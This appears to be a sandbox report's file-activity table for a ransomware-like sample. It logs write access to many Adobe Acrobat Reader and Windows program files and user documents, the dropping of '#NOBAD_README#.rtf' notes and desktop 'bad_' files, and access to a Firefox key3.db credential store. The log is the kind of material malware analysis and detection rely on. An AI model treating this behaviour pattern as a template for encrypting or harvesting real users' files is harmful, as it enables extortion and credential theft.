| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Genko_1.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\WinMail.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInTray.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-mac.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-ui-theme.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adc_logo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\config.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Memo.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\wabmig.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_18DFC06EA5F8FC78.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\tQy8TrSDoC6JjNIs.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\6 3f-9s_NR7DNDKh.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Lu-p9mF1o1k.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_18DFC06EA5F8FC78.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
